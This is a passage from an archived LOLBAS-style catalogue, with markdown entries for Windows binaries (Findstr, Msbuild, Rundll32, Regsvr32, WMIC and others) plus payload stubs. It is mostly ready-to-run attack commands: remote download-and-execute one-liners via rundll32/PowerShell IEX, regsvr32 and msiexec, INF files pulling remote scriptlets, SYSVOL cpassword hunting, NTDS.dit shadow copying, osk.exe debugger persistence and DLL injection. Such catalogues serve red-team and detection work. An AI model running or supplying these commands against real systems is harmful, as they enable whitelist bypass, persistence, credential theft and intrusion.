Searches for the string W3AllLov3DonaldTrump; since it does not exist, every line of file.exe is printed (/V) and redirected into an Alternate Data Stream (ADS) of the file.txt file.

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Same as above, but the source file is read from a WebDAV share, so the binary is downloaded and written into an Alternate Data Stream (ADS) of the file.txt file.

findstr /S /I cpassword \\sysvol\policies\*.xml
Search for stored passwords (cpassword) in Group Policy Preference files on SYSVOL.
```
* Resources:
  * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
  * c:\windows\system32\findstr.exe
  * c:\windows\sysWOW64\findstr.exe
* Notes:
  Thanks to Oddvar Moe - @oddvarmoe
================================================
FILE: Archive-Old-Version/OSBinaries/Forfiles.exe.md
================================================
## Forfiles.exe
* Functions: Execute, Read ADS
```
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Executes evil.exe from an Alternate Data Stream (ADS) of normal.dll since there is a match for notepad.exe in the c:\windows\system32 folder.
```
* Resources:
  * https://twitter.com/vector_sec/status/896049052642533376
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
  * C:\Windows\system32\forfiles.exe
  * C:\Windows\sysWOW64\forfiles.exe
* Notes:
  Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe
================================================
FILE: Archive-Old-Version/OSBinaries/Gpscript.exe.md
================================================
## Gpscript.exe
* Functions: Execute
```
Gpscript /logon
Executes logon scripts configured in Group Policy.

Gpscript /startup
Executes startup scripts configured in Group Policy.
```
* Resources:
  * https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
* Full path:
  * c:\windows\system32\gpscript.exe
  * c:\windows\sysWOW64\gpscript.exe
* Notes:
  Thanks to Oddvar Moe - @oddvarmoe
  Requires administrative rights and modifications to local group policy settings.
================================================
FILE: Archive-Old-Version/OSBinaries/IEExec.exe.md
================================================
## IEExec.exe
* Functions: Execute
```
ieexec.exe http://x.x.x.x:8080/bypass.exe
Downloads and executes bypass.exe from the remote server.
```
* Resources:
  * https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
* Full path:
  * c:\windows\system32\ieexec.exe
  * c:\windows\sysWOW64\ieexec.exe
* Notes:
  Thanks to Casey Smith - @subtee
================================================
FILE: Archive-Old-Version/OSBinaries/Ie4unit.exe.md
================================================
## Ie4uinit.exe
* Functions: Execute
```
ie4uinit.exe -BaseSettings
Executes commands from a specially prepared ieuinit.inf file located in the same directory as (a copy of) ie4uinit.exe.
```
* Resources:
  * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
* Full path:
  * c:\windows\system32\ie4uinit.exe
  * c:\windows\sysWOW64\ie4uinit.exe
  * c:\windows\system32\ieuinit.inf
  * c:\windows\sysWOW64\ieuinit.inf
* Notes:
  Thanks to Jimmy - @bohops
================================================
FILE: Archive-Old-Version/OSBinaries/InfDefaultInstall.exe.md
================================================
## InfDefaultInstall.exe
* Functions: Execute
```
InfDefaultInstall.exe Infdefaultinstall.inf
Executes an SCT scriptlet via scrobj.dll from a command entered into a specially prepared INF file.
```
* Resources:
  * https://twitter.com/KyleHanslovan/status/911997635455852544
  * https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
  * https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
* Full path:
  * c:\windows\system32\Infdefaultinstall.exe
  * c:\windows\sysWOW64\Infdefaultinstall.exe
* Notes:
  Thanks to Kyle Hanslovan - @kylehanslovan
================================================
FILE: Archive-Old-Version/OSBinaries/InstallUtil.exe.md
================================================
## InstallUtil.exe
* Functions: Execute
```
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Execute the target .NET DLL or EXE through its Installer class (the /U switch runs the uninstall path, so no prior installation is needed).
```
* Resources:
  * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
  * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
  * http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
  * https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
* Notes:
  Thanks to Casey Smith - @subtee
================================================
FILE: Archive-Old-Version/OSBinaries/Makecab.exe.md
================================================
## Makecab.exe
* Functions: Package, Add ADS, Download
```
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Compresses the source file into a CAB file stored in an Alternate Data Stream (ADS) of the target file.

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Compresses the source file from a WebDAV share and stores it in the target CAB file.

makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Compresses the source file from a WebDAV share into a CAB file stored in an Alternate Data Stream (ADS) of the target file.
```
* Resources:
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
  * c:\windows\system32\makecab.exe
  * c:\windows\sysWOW64\makecab.exe
* Notes:
  Thanks to Oddvar Moe - @oddvarmoe
================================================
FILE: Archive-Old-Version/OSBinaries/Mavinject.exe.md
================================================
## Mavinject.exe
* Functions: Execute, Read ADS
```
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Inject evil.dll into the process with PID 3110.

Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Inject file.dll, stored in an Alternate Data Stream (ADS), into the process with PID 4172.
```
* Resources:
  * https://twitter.com/gN3mes1s/status/941315826107510784
  * https://twitter.com/Hexcorn/status/776122138063409152
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
  * C:\Windows\System32\mavinject.exe
  * C:\Windows\SysWOW64\mavinject.exe
* Notes:
  Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe
================================================
FILE: Archive-Old-Version/OSBinaries/Microsoft.Wrokflow.Compiler.xml
================================================
Microsoft.Workflow.Compiler.xoml false true false false -1 false false false CSharp
================================================
FILE: Archive-Old-Version/OSBinaries/Microsoft.Wrokflow.Compiler.xoml
================================================
================================================
FILE: Archive-Old-Version/OSBinaries/Msbuild.exe.md
================================================
## Msbuild.exe
* Functions: Execute
```
msbuild.exe pshell.xml
Build and execute a C# project stored in the target XML file.

msbuild.exe Msbuild.csproj
Build and execute a C# project stored in the target CSPROJ file.
```
* Resources:
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
  * https://github.com/Cn33liz/MSBuildShell
  * https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
* Notes:
  Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis
================================================
FILE: Archive-Old-Version/OSBinaries/Msconfig.exe.md
================================================
## Msconfig.exe
* Functions: Execute
```
Msconfig.exe -5
Executes a command embedded in a crafted c:\windows\system32\mscfgtlc.xml.
```
* Resources:
  * https://twitter.com/pabraeken/status/991314564896690177
* Full path:
  * c:\windows\system32\msconfig.exe
* Notes:
  Thanks to Pierre-Alexandre Braeken - @pabraeken
  See the Payloads folder for an example mscfgtlc.xml file.
================================================
FILE: Archive-Old-Version/OSBinaries/Msdt.exe.md
================================================
## Msdt.exe
* Functions: Execute
```
Open .diagcab package

msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Executes the Microsoft Diagnostics Tool with the Program Compatibility troubleshooter and runs the malicious .MSI referenced in the PCW8E57.xml answer file.
```
* Resources:
  * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
  * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
  * https://twitter.com/harr0ey/status/991338229952598016
* Full path:
  * C:\Windows\System32\Msdt.exe
  * C:\Windows\SysWOW64\Msdt.exe
* Notes:
  Thanks to:
  See the Payloads folder for an example PCW8E57.xml file.
================================================
FILE: Archive-Old-Version/OSBinaries/Msiexec.exe.md
================================================
## Msiexec.exe
* Functions: Execute
```
msiexec /quiet /i cmd.msi
Installs the target .MSI file silently.

msiexec /q /i http://192.168.100.3/tmp/cmd.png
Installs the target remote (and renamed) .MSI file silently.

msiexec /y "C:\folder\evil.dll"
Calls DllRegisterServer to register the target DLL.

msiexec /z "C:\folder\evil.dll"
Calls DllUnregisterServer to un-register the target DLL.
```
* Resources:
  * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
  * https://twitter.com/PhilipTsukerman/status/992021361106268161
* Full path:
  * c:\windows\system32\msiexec.exe
  * c:\windows\sysWOW64\msiexec.exe
* Notes:
  Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman
================================================
FILE: Archive-Old-Version/OSBinaries/Netsh.exe.md
================================================
## Netsh.exe
* Functions: Execute, Surveillance
```
netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!()
netsh.exe trace show status
Capture network traffic to a trace file on a remote file share.

netsh.exe add helper C:\Path\file.dll
Load (execute) a netsh.exe helper DLL; the helper is registered in the registry and loaded every time netsh.exe runs.

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Forward traffic from the listening address and port to a remote system.
```
* Resources:
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
  * https://attack.mitre.org/wiki/Technique/T1128
  * https://twitter.com/teemuluotio/status/990532938952527873
* Full path:
  * C:\Windows\System32\netsh.exe
  * C:\Windows\SysWOW64\netsh.exe
* Notes:
================================================
FILE: Archive-Old-Version/OSBinaries/Nltest.exe.md
================================================
## Nltest.exe
* Functions: Credentials
```
nltest.exe /SERVER:192.168.1.10 /QUERY
Query the status of the Netlogon service on the target server.
```
* Resources:
  * https://twitter.com/sysopfb/status/986799053668139009
  * https://ss64.com/nt/nltest.html
* Full path:
  * c:\windows\system32\nltest.exe
* Notes:
  Thanks to Sysopfb - @sysopfb
================================================
FILE: Archive-Old-Version/OSBinaries/Openwith.exe.md
================================================
## Openwith.exe
* Functions: Execute
```
OpenWith.exe /c C:\test.hta
Opens the target file with the default application.

OpenWith.exe /c C:\testing.msi
Opens the target file with the default application.
```
* Resources:
  * https://twitter.com/harr0ey/status/991670870384021504
* Full path:
  * c:\windows\system32\Openwith.exe
  * c:\windows\sysWOW64\Openwith.exe
* Notes:
  Thanks to Matt harr0ey - @harr0ey
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Cmstp.inf
================================================
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Cmstp_calc.sct
================================================
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Evil.xbap
================================================
// Code-behind fragment of the XBAP payload: the button click handler launches evil.exe
// via Process.Start when the radio button is checked. Needs System.Diagnostics (Process)
// and System.Windows (RoutedEventArgs, MessageBox).
using System.Diagnostics;
using System.Windows;

private void Button_click(object sender, RoutedEventArgs e)
{
    if (RadioButton1.IsChecked == true)
    {
        Process.Start("C:\\poc\\evil.exe");
        MessageBox.Show("BHello.");
    }
}
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall.inf
================================================
[Version]
Signature=$CHICAGO$

[DefaultInstall]
UnregisterDlls = Squiblydoo

[Squiblydoo]
11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall_calc.sct
================================================
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Msbuild.csproj
================================================
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Mshta_calc.sct
================================================
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/PCW8E57.xml
================================================
ContextMenu NotListed C:\Windows\assembly\Exec-Execute.msi
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Regsvr32_calc.sct
================================================
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Wmic_calc.xsl
================================================
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/file.rsp
================================================
REGSVR evil.dll
================================================
FILE: Archive-Old-Version/OSBinaries/Payload/mscfgtlc.xml
================================================
================================================
FILE: Archive-Old-Version/OSBinaries/Pcalua.exe.md
================================================
## Pcalua.exe
* Functions: Execute
```
pcalua.exe -a calc.exe
Open the target .EXE using the Program Compatibility Assistant.

pcalua.exe -a \\server\payload.dll
Open the target .DLL file from a network share with the Program Compatibility Assistant.

pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Open the target .CPL file with the Program Compatibility Assistant.
```
* Resources:
  * https://twitter.com/KyleHanslovan/status/912659279806640128
* Full path:
  * c:\windows\system32\pcalua.exe
* Notes:
  Thanks to: fab - @0rbz_, Kyle Hanslovan - @KyleHanslovan
================================================
FILE: Archive-Old-Version/OSBinaries/Pcwrun.exe.md
================================================
## Pcwrun.exe
* Functions: Execute
```
Pcwrun.exe c:\temp\beacon.exe
Open the target .EXE file with the Program Compatibility Wizard.
```

* Resources:
  * https://twitter.com/pabraeken/status/991335019833708544

* Full path:
  * c:\windows\system32\pcwrun.exe

* Notes:
Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OSBinaries/Powershell.exe.md
================================================
## Powershell.exe

* Functions: Execute, Read ADS

```
powershell -ep bypass - < c:\temp:ttt
Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
```

* Resources:
  * https://twitter.com/Moriarty_Meng/status/984380793383370752

* Full path:
  * C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  * C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

* Notes:
Thanks to Moriarty - @Moriarty_Meng

================================================
FILE: Archive-Old-Version/OSBinaries/PresentationHost.exe.md
================================================
## PresentationHost.exe

* Functions: Execute

```
Presentationhost.exe C:\temp\Evil.xbap
Executes the target XAML Browser Application (XBAP) file.
```

* Resources:
  * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
  * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

* Full path:
  * c:\windows\system32\PresentationHost.exe
  * c:\windows\sysWOW64\PresentationHost.exe

* Notes:
Thanks to Casey Smith - @subtee

================================================
FILE: Archive-Old-Version/OSBinaries/Print.exe.md
================================================
## Print.exe

* Functions: Download, Copy, Add ADS

```
print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Copy file.exe into the Alternate Data Stream (ADS) of file.txt.

print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe

print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
```

* Resources:
  * https://twitter.com/Oddvarmoe/status/985518877076541440
  * https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410

* Full path:
  * C:\Windows\System32\print.exe
  * C:\Windows\SysWOW64\print.exe

* Notes:
Thanks to Oddvar Moe - @oddvarmoe

================================================
FILE: Archive-Old-Version/OSBinaries/Psr.exe.md
================================================
## Psr.exe

* Functions: Surveillance

```
psr.exe /start /gui 0 /output c:\users\user\out.zip
Capture screenshots of the desktop and save them in the target .ZIP file.

psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip
Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.

psr.exe /stop
Stop the Problem Step Recorder.
```

* Resources:
  * https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf

* Full path:
  * C:\Windows\System32\Psr.exe
  * C:\Windows\SysWOW64\Psr.exe

* Notes:
Thanks to

================================================
FILE: Archive-Old-Version/OSBinaries/Regasm.exe.md
================================================
## Regasm.exe

* Functions: Execute

```
regasm.exe /U AllTheThingsx64.dll
Loads the target .DLL file and executes the UnRegisterClass function.

regasm.exe AllTheThingsx64.dll
Loads the target .DLL file and executes the RegisterClass function.
```

* Resources:
  * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

* Full path:
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe

* Notes:
Thanks to Casey Smith - @subtee

================================================
FILE: Archive-Old-Version/OSBinaries/Register-cimprovider.exe.md
================================================
## Register-cimprovider.exe

* Functions: Execute

```
Register-cimprovider -path "C:\folder\evil.dll"
Load the target .DLL.
```

* Resources:
  * https://twitter.com/PhilipTsukerman/status/992021361106268161

* Full path:
  * c:\windows\system32\Register-cimprovider.exe
  * c:\windows\sysWOW64\Register-cimprovider.exe

* Notes:
Thanks to PhilipTsukerman - @PhilipTsukerman

================================================
FILE: Archive-Old-Version/OSBinaries/Regsvcs.exe.md
================================================
## Regsvcs.exe

* Functions: Execute

```
regsvcs.exe AllTheThingsx64.dll
Loads the target .DLL file and executes the RegisterClass function.
```

* Resources:
  * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

* Full path:
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe

* Notes:
Thanks to Casey Smith - @subtee

================================================
FILE: Archive-Old-Version/OSBinaries/Regsvr32.exe.md
================================================
## Regsvr32.exe

* Functions: Execute

```
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Execute the specified remote .SCT script with scrobj.dll.

Execute the specified local .SCT script with scrobj.dll.
```

* Resources:
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  * https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/

* Full path:
  * C:\Windows\System32\regsvr32.exe
  * C:\Windows\SysWOW64\regsvr32.exe

* Notes:
Thanks to Casey Smith - @subtee

================================================
FILE: Archive-Old-Version/OSBinaries/Replace.exe.md
================================================
## Replace.exe

* Functions: Copy, Download

```
replace.exe C:\Source\File.cab C:\Destination /A
Copy the specified file to the destination folder.

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Copy the specified file to the destination folder.
```

* Resources:
  * https://twitter.com/elceef/status/986334113941655553
  * https://twitter.com/elceef/status/986842299861782529

* Full path:
  * C:\Windows\System32\replace.exe
  * C:\Windows\SysWOW64\replace.exe

* Notes:
Thanks to elceef - @elceef

================================================
FILE: Archive-Old-Version/OSBinaries/Robocopy.exe.md
================================================
## Robocopy.exe

* Functions: Copy

```
Robocopy.exe C:\SourceFolder C:\DestFolder
Copy the entire contents of the SourceFolder to the DestFolder.

Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
Copy the entire contents of the SourceFolder to the DestFolder.
```

* Resources:
  * https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx

* Full path:
  * c:\windows\system32\binary.exe
  * c:\windows\sysWOW64\binary.exe

* Notes:
Thanks to Name of guy - @twitterhandle

================================================
FILE: Archive-Old-Version/OSBinaries/Rpcping.exe.md
================================================
## Rpcping.exe

* Functions: Credentials

```
rpcping -s 127.0.0.1 -t ncacn_np
Send an RPC test connection to the target server (-s), sending the password hash in the process.

rpcping -s 192.168.1.10 -ncacn_np
Send an RPC test connection to the target server (-s), sending the password hash in the process.

rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
```

* Resources:
  * https://twitter.com/subtee/status/872797890539913216
  * https://github.com/vysec/RedTips
  * https://twitter.com/vysecurity/status/974806438316072960
  * https://twitter.com/vysecurity/status/873181705024266241

* Full path:
  * C:\Windows\System32\rpcping.exe
  * C:\Windows\SysWOW64\rpcping.exe

* Notes:
Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity

================================================
FILE: Archive-Old-Version/OSBinaries/Rundll32.exe.md
================================================
## Rundll32.exe

* Functions: Execute, Read ADS

```
rundll32.exe AllTheThingsx64,EntryPoint
Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Use Rundll32.exe to execute a JavaScript script that runs calc.exe.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
```

* Resources:
  * https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
  * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

* Full path:
  * C:\Windows\System32\rundll32.exe
  * C:\Windows\SysWOW64\rundll32.exe

* Notes:
Thanks to Casey Smith - @subtee

================================================
FILE: Archive-Old-Version/OSBinaries/Runonce.exe.md
================================================
## Runonce.exe

* Functions: Execute

```
Runonce.exe /AlternateShellStartup
Executes a Run Once Task that has been configured in the registry.
```

* Resources:
  * https://twitter.com/pabraeken/status/990717080805789697
  * https://cmatskas.com/configure-a-runonce-task-on-windows/

* Full path:
  * c:\windows\system32\runonce.exe
  * c:\windows\sysWOW64\runonce.exe

* Notes:
Thanks to Pierre-Alexandre Braeken - @pabraeken
Requires Administrative access.

================================================
FILE: Archive-Old-Version/OSBinaries/Runscripthelper.exe.md
================================================
## Runscripthelper.exe

* Functions: Execute

```
runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Execute the PowerShell script named test.txt.
```

* Resources:
  * https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc

* Full path:
  * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
  * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

* Notes:
Thanks to Matt Graeber - @mattifestation

================================================
FILE: Archive-Old-Version/OSBinaries/SC.exe.md
================================================
## SC.exe

* Functions: Execute, Read ADS, Create Service, Start Service

```
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
```

* Resources:
  * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

* Full path:
  * C:\Windows\System32\sc.exe
  * C:\Windows\SysWOW64\sc.exe

* Notes:
Thanks to Oddvar Moe - @oddvarmoe

================================================
FILE: Archive-Old-Version/OSBinaries/Scriptrunner.exe.md
================================================
## Scriptrunner.exe

* Functions: Execute

```
Scriptrunner.exe -appvscript calc.exe
Execute calc.exe.

ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Execute the calc.cmd script on the remote share.
```

* Resources:
  * https://twitter.com/KyleHanslovan/status/914800377580503040
  * https://twitter.com/NickTyrer/status/914234924655312896
  * https://github.com/MoooKitty/Code-Execution

* Full path:
  * c:\windows\system32\scriptrunner.exe
  * c:\windows\sysWOW64\scriptrunner.exe

* Notes:
Thanks to Nick Tyrer - @NickTyrer

================================================
FILE: Archive-Old-Version/OSBinaries/SyncAppvPublishingServer.exe.md
================================================
## SyncAppvPublishingServer.exe

* Functions: Execute

```
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Example command showing how to inject PowerShell code into the process.
```

* Resources:
  * https://twitter.com/monoxgas/status/895045566090010624

* Full path:
  * C:\Windows\System32\SyncAppvPublishingServer.exe

* Notes:
Thanks to Nick Landers - @monoxgas

================================================
FILE: Archive-Old-Version/OSBinaries/WMIC.exe.md
================================================
## WMIC.exe

* Functions: Reconnaissance, Execute, Read ADS

```
wmic.exe process call create calc
Execute calc.exe.

wmic.exe process call create "c:\ads\file.txt:program.exe"
Execute a .EXE file stored as an Alternate Data Stream (ADS).

wmic.exe useraccount get /ALL
List the user accounts on the machine.

wmic.exe process get caption,executablepath,commandline
Gets the command line used to execute a running program.

wmic.exe qfe get description,installedOn /format:csv
Gets a list of installed Windows updates.

wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%")
Check to see if the target system is running SQL.

get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
Use the PowerShell cmdlet to list the shares on a remote server.
wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.

wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Execute evil.exe on the remote system.

wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.

wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
Create a volume shadow copy of NTDS.dit that can be copied.

wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Execute a script contained in the target .XSL file hosted on a remote server.

wmic.exe os get /format:"MYXSLFILE.xsl"
Executes JScript or VBScript embedded in the target XSL stylesheet.

